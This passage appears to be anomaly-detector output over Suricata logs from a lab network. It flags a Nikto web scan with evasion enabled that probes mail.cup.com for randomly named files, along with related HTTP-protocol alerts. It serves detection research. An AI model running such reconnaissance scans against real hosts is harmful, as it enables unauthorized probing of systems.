"PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bas:ShowVolume", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.337148, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":135802554818065,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46934, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":135802554818065,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 135802554818065, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80", "/parser/model/time": 1583349514.341111, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46936, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sqlite", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.342355, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":630883435031917,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46936, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":630883435031917,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 630883435031917, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80", "/parser/model/time": 1583349514.343787, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46938, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ncf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.343942, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46938, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2066313044966357, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", 